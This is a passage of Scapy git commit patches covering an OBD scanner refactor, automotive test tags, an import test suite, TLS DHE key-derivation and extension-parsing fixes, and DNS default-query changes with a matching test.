custom_enumerators += [OBD_S02_Enumerator] + enumerators += [OBD_S02_Enumerator] elif opt == '-3': - specific_scan = True - custom_enumerators += [OBD_S03_Enumerator] + enumerators += [OBD_S03_Enumerator] elif opt == '-6': - specific_scan = True - custom_enumerators += [OBD_S06_Enumerator] + enumerators += [OBD_S06_Enumerator] elif opt == '-7': - specific_scan = True - custom_enumerators += [OBD_S07_Enumerator] + enumerators += [OBD_S07_Enumerator] elif opt == '-8': - specific_scan = True - custom_enumerators += [OBD_S08_Enumerator] + enumerators += [OBD_S08_Enumerator] elif opt == '-9': - specific_scan = True - custom_enumerators += [OBD_S09_Enumerator] + enumerators += [OBD_S09_Enumerator] elif opt == '-A': - specific_scan = True - custom_enumerators += [OBD_S0A_Enumerator] + enumerators += [OBD_S0A_Enumerator] elif opt in ('-v', '--verbose'): verbose = True except getopt.GetoptError as msg: @@ -183,16 +177,13 @@ def main(): with ISOTPSocket(csock, source, destination, basecls=OBD, padding=True) as isock: signal.signal(signal.SIGINT, signal_handler) - if specific_scan: - es = custom_enumerators - else: - es = OBD_Scanner.default_enumerator_clss - s = OBD_Scanner(isock, enumerators=es, full_scan=full_scan, - verbose=verbose, timeout=timeout) + + s = OBD_Scanner(isock, test_cases=enumerators, + full_scan=full_scan, verbose=verbose, + timeout=timeout) print("Starting OBD-Scan...") s.scan() - for e in s.enumerators: - e.show() + s.show_testcases() except Exception as e: usage(True) diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index 79202056bd0..09ad20decf6 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -25,6 +25,8 @@ load_contrib("automotive.obd.obd", globals_dict=globals()) from subprocess import call +from scapy.contrib.automotive.obd.scanner import OBD_Scanner + load_contrib("automotive.obd.scanner", globals_dict=globals()) load_contrib("automotive.ecu", globals_dict=globals()) @@ -155,16 +157,18 @@ assert s.enumerators[5].__class__ == OBD_S03_Enumerator assert s.enumerators[6].__class__ == OBD_S07_Enumerator assert s.enumerators[7].__class__ == OBD_S0A_Enumerator +print(len(s.enumerators[0].results)) + assert len(s.enumerators[0].results) == 33 # 32 pos resps + 1 NR -assert len([r for _, _, r in s.enumerators[0].results if r is not None and r.service == 0x7f]) == 1 +assert len([tup.resp for tup in s.enumerators[0].results if tup.resp is not None and tup.resp.service == 0x7f]) == 1 assert len(s.enumerators[1].results) == 1 # 1 NR -assert len([r for _, _, r in s.enumerators[1].results if r is not None and r.service == 0x7f]) == 1 +assert len([tup.resp for tup in s.enumerators[1].results if tup.resp is not None and tup.resp.service == 0x7f]) == 1 assert len(s.enumerators[2].results) == 18 # 17 pos resps + 1 NR -assert len([r for _, _, r in s.enumerators[2].results if r is not None and r.service == 0x7f]) == 1 +assert len([tup.resp for tup in s.enumerators[2].results if tup.resp is not None and tup.resp.service == 0x7f]) == 1 assert len(s.enumerators[3].results) == 1 # 1 NR -assert len([r for _, _, r in s.enumerators[3].results if r is not None and r.service == 0x7f]) == 1 +assert len([tup.resp for tup in s.enumerators[3].results if tup.resp is not None and tup.resp.service == 0x7f]) == 1 assert len(s.enumerators[4].results) == 9 # 8 pos resps + 1 NR -assert len([r for _, _, r in s.enumerators[4].results if r is not None and r.service == 0x7f]) == 1 +assert len([tup.resp for tup in s.enumerators[4].results if tup.resp is not None and tup.resp.service == 0x7f]) == 1 assert len(s.enumerators[5].results) == 1 # 1 PR assert len(s.enumerators[6].results) == 1 # 1 PR assert len(s.enumerators[7].results) == 1 # 1 PR @@ -199,15 +203,18 @@ assert s.enumerators[6].__class__ == OBD_S07_Enumerator assert s.enumerators[7].__class__ == OBD_S0A_Enumerator assert len(s.enumerators[0].results) == 0x100 # 32 pos resps + 1 NR -assert len([r for _, _, r in s.enumerators[0].results if r is not None and r.service == 0x7f]) == 0x100 - 32 +print( len(s.enumerators[0].results_with_negative_response)) +assert len(s.enumerators[0].results_with_negative_response) == 0x100 - 32 +print( len(s.enumerators[1].results)) assert len(s.enumerators[1].results) == 0x100 -assert len([r for _, _, r in s.enumerators[1].results if r is not None and r.service == 0x7f]) == 0x100 +print( len(s.enumerators[1].results_with_negative_response)) +assert len(s.enumerators[1].results_with_negative_response) == 0x100 assert len(s.enumerators[2].results) == 0x100 # 17 pos resps -assert len([r for _, _, r in s.enumerators[2].results if r is not None and r.service == 0x7f]) == 0x100 - 17 +assert len(s.enumerators[2].results_with_negative_response) == 0x100 - 17 assert len(s.enumerators[3].results) == 0x100 -assert len([r for _, _, r in s.enumerators[3].results if r is not None and r.service == 0x7f]) == 0x100 +assert len(s.enumerators[3].results_with_negative_response) == 0x100 assert len(s.enumerators[4].results) == 0x100 # 8 pos resps -assert len([r for _, _, r in s.enumerators[4].results if r is not None and r.service == 0x7f]) == 0x100 - 8 +assert len(s.enumerators[4].results_with_negative_response) == 0x100 - 8 assert len(s.enumerators[5].results) == 1 # 1 PR assert len(s.enumerators[6].results) == 1 # 1 PR assert len(s.enumerators[7].results) == 1 # 1 PR @@ -225,7 +232,7 @@ with new_can_socket0() as isocan_ecu, ISOTPSocket(isocan_ecu, 0x7e8, 0x7e0, base sim.start() try: with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e0, 0x7e8, basecls=OBD, padding=True) as socket: - s = OBD_Scanner(socket, enumerators=[OBD_S01_Enumerator], full_scan=False) + s = OBD_Scanner(socket, test_cases=[OBD_S01_Enumerator], full_scan=False) s.scan() socket.send(b"\xff\xff\xff") finally: @@ -235,7 +242,7 @@ assert len(s.enumerators) == 1 assert s.enumerators[0].__class__ == OBD_S01_Enumerator assert len(s.enumerators[0].results) == 33 # 32 pos resps + 1 NR -assert len([r for _, _, r in s.enumerators[0].results if r is not None and r.service == 0x7f]) == 1 +assert len(s.enumerators[0].results_with_negative_response) == 1 + Cleanup diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index 550542e1855..6d0fc43fc09 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -129,14 +129,16 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, try: result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) std_out1, std_err1 = result.communicate() + print(std_out2, std_err2) result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) std_out2, std_err2 = result.communicate() + print(std_out2, std_err2) except Exception as e: print(e) finally: tester.send(b"\x01\xff\xff\xff\xff") sim.join(timeout=10) - expected_output = ["5 requests were sent, 4 answered", "2 requests were sent, 1 answered", "1 requests were sent, 1 answered"] + expected_output = ["supported_pids=PID0F+PID0B+PID03", "fuel_system1=OpenLoopInsufficientEngineTemperature fuel_system2=ClosedLoop", "data=100 kPa", "data=50.0 deg. C"] for out in expected_output: assert bytes_encode(out) in bytes_encode(std_out1) or bytes_encode(out) in bytes_encode(std_out2) @@ -174,14 +176,16 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, try: result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30", "-1"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) std_out1, std_err1 = result.communicate() + print(std_out1, std_err1) result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30", "-1"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) std_out2, std_err2 = result.communicate() + print(std_out2, std_err2) except Exception as e: print(e) finally: tester.send(b"\x01\xff\xff\xff\xff") sim.join(timeout=10) - expected_output = ["5 requests were sent, 4 answered"] + expected_output = ["supported_pids=PID0F+PID0B+PID03", "fuel_system1=OpenLoopInsufficientEngineTemperature fuel_system2=ClosedLoop", "data=100 kPa", "data=50.0 deg. C"] for out in expected_output: assert bytes_encode(out) in bytes_encode(std_out1) or bytes_encode(out) in bytes_encode(std_out2) From cdeea0a729d2c3b64fc3e0e2206ae43c37ffe74f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 9 Jul 2021 15:36:14 +0200 Subject: [PATCH 0604/1632] Re-enable ISOTP unit tests for MAC OSX, BSD, Windows and PyPy machines (#3268) --- test/configs/bsd.utsc | 1 - test/contrib/automotive/ecu_am.uts | 2 +- test/contrib/automotive/gm/gmlanutils.uts | 2 +- test/contrib/automotive/obd/scanner.uts | 2 +- test/contrib/automotive/uds_utils.uts | 2 +- test/contrib/automotive/xcp/xcp_comm.uts | 2 +- test/contrib/isotp.uts | 2 +- test/contrib/isotpscan.uts | 4 +--- test/run_tests | 2 +- test/run_tests.bat | 2 +- test/tools/isotpscanner.uts | 2 +- test/tools/obdscanner.uts | 2 +- test/tools/xcpscanner.uts | 2 +- 13 files changed, 12 insertions(+), 15 deletions(-) diff --git a/test/configs/bsd.utsc b/test/configs/bsd.utsc index 705d10c0b47..27cc5baf588 100644 --- a/test/configs/bsd.utsc +++ b/test/configs/bsd.utsc @@ -15,7 +15,6 @@ "test/windows.uts", "test/contrib/automotive/ecu_am.uts", "test/contrib/automotive/gm/gmlanutils.uts", - "test/contrib/isotp.uts", "test/contrib/isotpscan.uts" ], "onlyfailed": true, diff --git a/test/contrib/automotive/ecu_am.uts b/test/contrib/automotive/ecu_am.uts index e191901cbed..6c31ef9411e 100644 --- a/test/contrib/automotive/ecu_am.uts +++ b/test/contrib/automotive/ecu_am.uts @@ -1,5 +1,5 @@ % Regression tests for EcuAnsweringMachine -~ not_pypy +~ not_pypy automotive_comm + Configuration ~ conf diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 1032a7ba35e..94f1b3707b9 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -1,5 +1,5 @@ % Regression tests for gmlanutil -~ not_pypy needs_root +~ not_pypy needs_root automotive_comm + Configuration ~ conf diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index 09ad20decf6..f3deb13ec93 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -1,5 +1,5 @@ % Regression tests for obd_scan -~ needs_root not_pypy +~ needs_root not_pypy automotive_comm + Configuration ~ conf diff --git a/test/contrib/automotive/uds_utils.uts b/test/contrib/automotive/uds_utils.uts index 34b5b6588c6..a68983d1658 100644 --- a/test/contrib/automotive/uds_utils.uts +++ b/test/contrib/automotive/uds_utils.uts @@ -1,5 +1,5 @@ % Regression tests for uds_utils -~ needs_root not_pypy +~ needs_root not_pypy automotive_comm + Configuration ~ conf diff --git a/test/contrib/automotive/xcp/xcp_comm.uts b/test/contrib/automotive/xcp/xcp_comm.uts index f29a9cf2c5e..d0d70a6574e 100644 --- a/test/contrib/automotive/xcp/xcp_comm.uts +++ b/test/contrib/automotive/xcp/xcp_comm.uts @@ -1,5 +1,5 @@ % Regression tests for the XCP using CANSockets -~ not_pypy +~ not_pypy automotive_comm # More information at http://www.secdev.org/projects/UTscapy/ ############ diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index 786b456a2e5..29c270e34fb 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -1,6 +1,6 @@ % Regression tests for ISOTP -~ vcan_socket +~ automotive_comm + Configuration ~ conf diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index ecfb76dc8ce..6367158dd36 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -1,9 +1,7 @@ % Regression tests for isotp_scan -~ not_pypy vcan_socket needs_root +~ not_pypy vcan_socket needs_root automotive_comm * Some tests are disabled to lower the CI utilitzation -~ vcan_socket - + Configuration ~ conf diff --git a/test/run_tests b/test/run_tests index ab892d89135..594f74dbf35 100755 --- a/test/run_tests +++ b/test/run_tests @@ -54,7 +54,7 @@ then fi # Run tox - export UT_FLAGS="-K tcpdump -K manufdb -K wireshark -K ci_only -K vcan_socket" + export UT_FLAGS="-K tcpdump -K manufdb -K wireshark -K ci_only -K vcan_socket -K automotive_comm" export SIMPLE_TESTS="true" PYVER=$($PYTHON -c "import sys; print('.'.join(sys.version.split('.')[:2]))") ${DIR}/.config/ci/test.sh $PYVER non_root diff --git a/test/run_tests.bat b/test/run_tests.bat index 41c6ebb3dfb..f3812ea359d 100644 --- a/test/run_tests.bat +++ b/test/run_tests.bat @@ -28,7 +28,7 @@ IF "%_args%" == "" ( exit 1 ) REM Run tox - %PYTHON% -m tox -- -K tcpdump -K manufdb -K wireshark -K ci_only + %PYTHON% -m tox -- -K tcpdump -K manufdb -K wireshark -K ci_only -K automotive_comm pause exit 0 ) diff --git a/test/tools/isotpscanner.uts b/test/tools/isotpscanner.uts index 2e377f31938..12532c85843 100644 --- a/test/tools/isotpscanner.uts +++ b/test/tools/isotpscanner.uts @@ -1,5 +1,5 @@ % Regression tests for isotpscanner -~ vcan_socket needs_root linux not_pypy +~ vcan_socket needs_root linux not_pypy automotive_comm + Configuration diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index 6d0fc43fc09..ef562b75171 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -1,5 +1,5 @@ % Regression tests for obdscanner -~ vcan_socket needs_root linux not_pypy +~ vcan_socket needs_root linux not_pypy automotive_comm + Configuration ~ conf diff --git a/test/tools/xcpscanner.uts b/test/tools/xcpscanner.uts index 9cceb43a74b..00a972e5539 100644 --- a/test/tools/xcpscanner.uts +++ b/test/tools/xcpscanner.uts @@ -1,5 +1,5 @@ % Regression tests for the XCP_CAN -~ needs_root not_pypy +~ needs_root not_pypy automotive_comm # More information at http://www.secdev.org/projects/UTscapy/ From b781302fb56bfca21f0dd294d1bf6aa1c5a323a2 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 13 Jul 2021 19:10:48 +0200 Subject: [PATCH 0605/1632] Minor UTscapy tweak (conf.use_pcap is set later on windows) --- scapy/tools/UTscapy.py | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 4ef51f532dd..b789910873a 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -1077,13 +1077,10 @@ def main(): except AttributeError: pass - if conf.use_pcap: + if conf.use_pcap or WINDOWS: KW_KO.append("not_libpcap") if VERB > 2: print(" " + arrow + " libpcap mode") - elif WINDOWS and not NON_ROOT: - print("ERROR: libpcap is required on Windows for root tests") - raise SystemExit KW_KO.append("disabled") From 66b611c935f0b9ddb92fb4d6c1e2eefcc4fd5f3f Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 14 Jul 2021 00:39:47 +0200 Subject: [PATCH 0606/1632] Consistently test all of Scapy's imports (#3247) --- scapy/arch/bpf/supersocket.py | 2 +- test/import_tester | 3 -- test/imports.uts | 89 +++++++++++++++++++++++++++++++++++ 3 files changed, 90 insertions(+), 4 deletions(-) delete mode 100644 test/import_tester create mode 100644 test/imports.uts diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index 8587e6fa6b5..7f7fc406be8 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -24,7 +24,6 @@ from scapy.interfaces import network_name from scapy.supersocket import SuperSocket from scapy.compat import raw -from scapy.layers.l2 import Loopback if FREEBSD: @@ -375,6 +374,7 @@ def recv(self, x=BPF_BUFFER_LENGTH): def send(self, pkt): """Send a packet""" + from scapy.layers.l2 import Loopback # Use the routing table to find the output interface iff = pkt.route()[0] diff --git a/test/import_tester b/test/import_tester deleted file mode 100644 index eebaba60135..00000000000 --- a/test/import_tester +++ /dev/null @@ -1,3 +0,0 @@ -#! /bin/bash -cd "$(dirname $0)/.." -find scapy -name '*.py' | sed -e 's#/#.#g' -e 's/\(\.__init__\)\?\.py$//' | while read a; do echo "######### $a"; python -c "import $a"; done diff --git a/test/imports.uts b/test/imports.uts new file mode 100644 index 00000000000..8c7e02a89b7 --- /dev/null +++ b/test/imports.uts @@ -0,0 +1,89 @@ +% Import tests + ++ Import tests +~ python3_only imports + += Prepare importing all scapy files + +import glob +import subprocess + +# DEV: to add your file to this list, make sure you have +# a GREAT reason. +EXCEPTIONS = [ + "scapy.__main__", + "scapy.contrib.automotive*", + "scapy.contrib.cansocket*", + "scapy.contrib.isotp*", + "scapy.contrib.scada*", + "scapy.main", +] +EXCEPTION_PACKAGES = [ + "arch", + "libs", + "modules", + "tools", +] + +ALL_FILES = [ + "scapy." + re.match(r".*scapy\/(.*)\.py$", x).group(1).replace("/", ".") + for x in glob.iglob(scapy_path('/scapy/**/*.py'), recursive=True) +] +ALL_FILES = [ + x for x in ALL_FILES if + not any(x == y if y[-1] != "*" else x.startswith(y[:-1]) for y in EXCEPTIONS) and + x.split(".")[1] not in EXCEPTION_PACKAGES +] + +import importlib +from multiprocessing import Pool + +process_file_code = """# This was automatically generated +import subprocess, sys + +def process_file(file): + proc = subprocess.Popen( + [sys.executable, "-c", + "import %s" % file], + stderr=subprocess.PIPE, + encoding="utf8") + errs = "" + try: + _, errs = proc.communicate(timeout=10) + except subprocess.TimeoutExpired: + proc.kill() + errs = "Timed out !" + if proc.returncode != 0: + return "Importing the file '%s' failed !\\n%s" % (file, errs) + return None +""" + +tmp = get_temp_file(autoext=".py", keep=True) +print(tmp) +with open(tmp, "w") as fd: + fd.write(process_file_code) + +fld, file = os.path.split(tmp) +sys.path.append(fld) +pkg = importlib.import_module(os.path.splitext(file)[0]) + +def import_all(FILES): + with Pool(processes=8) as pool: + for err in pool.imap_unordered(pkg.process_file, FILES, 4): + if err: + print(err) + pool.terminate() + raise ImportError + + += Try importing all core separately + +import_all(x for x in ALL_FILES if "layers" not in x and "contrib" not in x) + += Try importing all layers separately + +import_all(x for x in ALL_FILES if "layers" in x) + += Try importing all contribs separately + +import_all(x for x in ALL_FILES if "contrib" in x) From 911e2de395e6cc1d7660f19f79df662188de83f1 Mon Sep 17 00:00:00 2001 From: Olivier Levillain Date: Thu, 15 Jul 2021 11:05:04 +0200 Subject: [PATCH 0607/1632] Fix an error in the PMS derivation for DHE key exchange in TLS. The RFC states that the leading zero bytes must be stripped when storing the Pre Master Secret. This is bad practice, since it leads to exploitable timing attacks such as the Raccoon Attack (https://blog.min.io/raccoonattack/, which is CVE-2020-1968 for OpenSSL). However, this is the standard and the current implementation leads to handshake failure with a probability of 1/256. The leading zero injunction does NOT apply to ECDHE. --- scapy/layers/tls/keyexchange.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index baf50e5afd7..797636fa45a 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -746,7 +746,7 @@ def fill_missing(self): if s.client_kx_privkey and s.server_kx_pubkey: pms = s.client_kx_privkey.exchange(s.server_kx_pubkey) - s.pre_master_secret = pms + s.pre_master_secret = pms.lstrip(b"\x00") if not s.extms or s.session_hash: # If extms is set (extended master secret), the key will # need the session hash to be computed. This is provided @@ -780,7 +780,7 @@ def post_dissection(self, m): if s.server_kx_privkey and s.client_kx_pubkey: ZZ = s.server_kx_privkey.exchange(s.client_kx_pubkey) - s.pre_master_secret = ZZ + s.pre_master_secret = ZZ.lstrip(b"\x00") if not s.extms or s.session_hash: s.compute_ms_and_derive_keys() From f2322ea0e22bc600f33df51e54d183c51c4466ac Mon Sep 17 00:00:00 2001 From: Olivier Levillain Date: Thu, 15 Jul 2021 17:14:42 +0200 Subject: [PATCH 0608/1632] Relax a constraint in TLS Hello Extension handling. The removed comment suggests that RFC 5246 forbids explicitly empty extensions. However, RFC5246 describes the field, when present, to be of the following type: Extension extensions<0..2^16-1>; Which means that the variable length can be 0. When scapy/tls speaks to some stacks (such as the Erlang one), we can encounter a case where the ServerHello emitted by such stacks will contain an extensions field with just 00 00, which can lead to a handshake failure or strange behaviour from the automaton. It stills seems to be a good idea not to emit the length field in the build phase, when the actual extension list is empty. --- scapy/layers/tls/extensions.py | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/scapy/layers/tls/extensions.py b/scapy/layers/tls/extensions.py index 86dea5c11a5..0b1e9fc3269 100644 --- a/scapy/layers/tls/extensions.py +++ b/scapy/layers/tls/extensions.py @@ -727,13 +727,12 @@ class _ExtensionsLenField(FieldLenField): def getfield(self, pkt, s): """ We try to compute a length, usually from a msglen parsed earlier. - If this length is 0, we consider 'selection_present' (from RFC 5246) - to be False. This means that there should not be any length field. - However, with TLS 1.3, zero lengths are always explicit. + If we can not find any length, we consider 'extensions_present' + (from RFC 5246) to be False. """ ext = pkt.get_field(self.length_of) tmp_len = ext.length_from(pkt) - if tmp_len is None or tmp_len <= 0: + if tmp_len is None: v = pkt.tls_session.tls_version if v is None or v < 0x0304: return s, None From 4e31cfcd50f19df259be4c737a0cb70129cb4457 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 19 Jul 2021 08:44:46 +0000 Subject: [PATCH 0609/1632] UTscapy: hotfix --- scapy/autorun.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/autorun.py b/scapy/autorun.py index 66f399f16dc..671f7222175 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -73,7 +73,7 @@ def autorun_commands(cmds, my_globals=None, verb=None): sys.last_traceback.tb_next, file=sys.stdout) sys.last_value = None - return None + return False cmd = "" if len(cmds) <= 1: break From e29ff3e24ee95a95d438042e8530af2a227de755 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 13 Jul 2021 13:16:05 +0000 Subject: [PATCH 0610/1632] Make sure that a DNS query contains a DNSQR --- scapy/layers/dns.py | 81 +++++++++++++++++++++++-------------------- scapy/layers/llmnr.py | 8 ++--- 2 files changed, 47 insertions(+), 42 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index b1c9f456c12..9e03811357f 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -28,6 +28,31 @@ from scapy.modules.six.moves import range +# https://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-4 +dnstypes = { + 0: "ANY", + 1: "A", 2: "NS", 3: "MD", 4: "MF", 5: "CNAME", 6: "SOA", 7: "MB", 8: "MG", + 9: "MR", 10: "NULL", 11: "WKS", 12: "PTR", 13: "HINFO", 14: "MINFO", + 15: "MX", 16: "TXT", 17: "RP", 18: "AFSDB", 19: "X25", 20: "ISDN", + 21: "RT", 22: "NSAP", 23: "NSAP-PTR", 24: "SIG", 25: "KEY", 26: "PX", + 27: "GPOS", 28: "AAAA", 29: "LOC", 30: "NXT", 31: "EID", 32: "NIMLOC", + 33: "SRV", 34: "ATMA", 35: "NAPTR", 36: "KX", 37: "CERT", 38: "A6", + 39: "DNAME", 40: "SINK", 41: "OPT", 42: "APL", 43: "DS", 44: "SSHFP", + 45: "IPSECKEY", 46: "RRSIG", 47: "NSEC", 48: "DNSKEY", 49: "DHCID", + 50: "NSEC3", 51: "NSEC3PARAM", 52: "TLSA", 53: "SMIMEA", 55: "HIP", + 56: "NINFO", 57: "RKEY", 58: "TALINK", 59: "CDS", 60: "CDNSKEY", + 61: "OPENPGPKEY", 62: "CSYNC", 99: "SPF", 100: "UINFO", 101: "UID", + 102: "GID", 103: "UNSPEC", 104: "NID", 105: "L32", 106: "L64", 107: "LP", + 108: "EUI48", 109: "EUI64", 249: "TKEY", 250: "TSIG", 256: "URI", + 257: "CAA", 258: "AVC", 32768: "TA", 32769: "DLV", 65535: "RESERVED" +} + + +dnsqtypes = {251: "IXFR", 252: "AXFR", 253: "MAILB", 254: "MAILA", 255: "ALL"} +dnsqtypes.update(dnstypes) +dnsclasses = {1: 'IN', 2: 'CS', 3: 'CH', 4: 'HS', 255: 'ANY'} + + def dns_get_str(s, pointer=0, pkt=None, _fullpacket=False): """This function decompresses a string s, starting from the given pointer. @@ -288,12 +313,16 @@ def i2h(self, pkt, x): class DNSRRField(StrField): - __slots__ = ["countfld", "passon"] + __slots__ = ["countfld", "passon", "rr"] holds_packets = 1 - def __init__(self, name, countfld, passon=1): + def __init__(self, name, countfld, default, passon=1): StrField.__init__(self, name, None) self.countfld = countfld + # Notes: + # - self.rr: used by DNSRRCountField() to compute the records count + # - self.default: used to set the default record + self.rr = self.default = default self.passon = passon def i2m(self, pkt, x): @@ -394,6 +423,14 @@ def i2m(self, pkt, s): return ret_s +class DNSQR(InheritOriginDNSStrPacket): + name = "DNS Question Record" + show_indent = 0 + fields_desc = [DNSStrField("qname", "www.example.com"), + ShortEnumField("qtype", 1, dnsqtypes), + ShortEnumField("qclass", 1, dnsclasses)] + + class DNS(Packet): name = "DNS" fields_desc = [ @@ -417,10 +454,10 @@ class DNS(Packet): DNSRRCountField("ancount", None, "an"), DNSRRCountField("nscount", None, "ns"), DNSRRCountField("arcount", None, "ar"), - DNSQRField("qd", "qdcount"), - DNSRRField("an", "ancount"), - DNSRRField("ns", "nscount"), - DNSRRField("ar", "arcount", 0), + DNSQRField("qd", "qdcount", DNSQR()), + DNSRRField("an", "ancount", None), + DNSRRField("ns", "nscount", None), + DNSRRField("ar", "arcount", None, 0), ] def answers(self, other): @@ -473,38 +510,6 @@ def pre_dissect(self, s): return s -# https://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-4 -dnstypes = { - 0: "ANY", - 1: "A", 2: "NS", 3: "MD", 4: "MF", 5: "CNAME", 6: "SOA", 7: "MB", 8: "MG", - 9: "MR", 10: "NULL", 11: "WKS", 12: "PTR", 13: "HINFO", 14: "MINFO", - 15: "MX", 16: "TXT", 17: "RP", 18: "AFSDB", 19: "X25", 20: "ISDN", 21: "RT", # noqa: E501 - 22: "NSAP", 23: "NSAP-PTR", 24: "SIG", 25: "KEY", 26: "PX", 27: "GPOS", - 28: "AAAA", 29: "LOC", 30: "NXT", 31: "EID", 32: "NIMLOC", 33: "SRV", - 34: "ATMA", 35: "NAPTR", 36: "KX", 37: "CERT", 38: "A6", 39: "DNAME", - 40: "SINK", 41: "OPT", 42: "APL", 43: "DS", 44: "SSHFP", 45: "IPSECKEY", - 46: "RRSIG", 47: "NSEC", 48: "DNSKEY", 49: "DHCID", 50: "NSEC3", - 51: "NSEC3PARAM", 52: "TLSA", 53: "SMIMEA", 55: "HIP", 56: "NINFO", 57: "RKEY", # noqa: E501 - 58: "TALINK", 59: "CDS", 60: "CDNSKEY", 61: "OPENPGPKEY", 62: "CSYNC", - 99: "SPF", 100: "UINFO", 101: "UID", 102: "GID", 103: "UNSPEC", 104: "NID", - 105: "L32", 106: "L64", 107: "LP", 108: "EUI48", 109: "EUI64", - 249: "TKEY", 250: "TSIG", 256: "URI", 257: "CAA", 258: "AVC", - 32768: "TA", 32769: "DLV", 65535: "RESERVED" -} - -dnsqtypes = {251: "IXFR", 252: "AXFR", 253: "MAILB", 254: "MAILA", 255: "ALL"} -dnsqtypes.update(dnstypes) -dnsclasses = {1: 'IN', 2: 'CS', 3: 'CH', 4: 'HS', 255: 'ANY'} - - -class DNSQR(InheritOriginDNSStrPacket): - name = "DNS Question Record" - show_indent = 0 - fields_desc = [DNSStrField("qname", "www.example.com"), - ShortEnumField("qtype", 1, dnsqtypes), - ShortEnumField("qclass", 1, dnsclasses)] - - # RFC 2671 - Extension Mechanisms for DNS (EDNS0) class EDNS0TLV(Packet): diff --git a/scapy/layers/llmnr.py b/scapy/layers/llmnr.py index b606f3717e2..c2bb3e58bd3 100644 --- a/scapy/layers/llmnr.py +++ b/scapy/layers/llmnr.py @@ -38,10 +38,10 @@ class LLMNRQuery(Packet): DNSRRCountField("ancount", None, "an"), DNSRRCountField("nscount", None, "ns"), DNSRRCountField("arcount", None, "ar"), - DNSQRField("qd", "qdcount"), - DNSRRField("an", "ancount"), - DNSRRField("ns", "nscount"), - DNSRRField("ar", "arcount", 0)] + DNSQRField("qd", "qdcount", None), + DNSRRField("an", "ancount", None), + DNSRRField("ns", "nscount", None), + DNSRRField("ar", "arcount", None, 0)] overload_fields = {UDP: {"sport": 5355, "dport": 5355}} def hashret(self): From bffbc6b28255255ee50dad62fb5bf8d157a59a92 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Fri, 16 Jul 2021 15:47:31 +0200 Subject: [PATCH 0611/1632] Test a simple DNS request --- test/scapy/layers/dns.uts | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 2f052d56aaf..cc9ab93abad 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -218,3 +218,7 @@ assert p.ar.rrname == b'.' assert dns_encode(b"www.google.com") == b'\x03www\x06google\x03com\x00' assert dns_encode(b"*") == b'\x01*\x00' assert dns_encode(dns_encode(b"*")) == b'\x03\x01*\x00' + += DNS - simple request + +assert raw(DNS()) == b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03www\x07example\x03com\x00\x00\x01\x00\x01' From 556d2a0a6002a8d2ae2edfc60d46e3961083c433 Mon Sep 17 00:00:00 2001 From: xiaohuihui <736544419@qq.com> Date: Tue, 20 Jul 2021 06:53:11 +0800 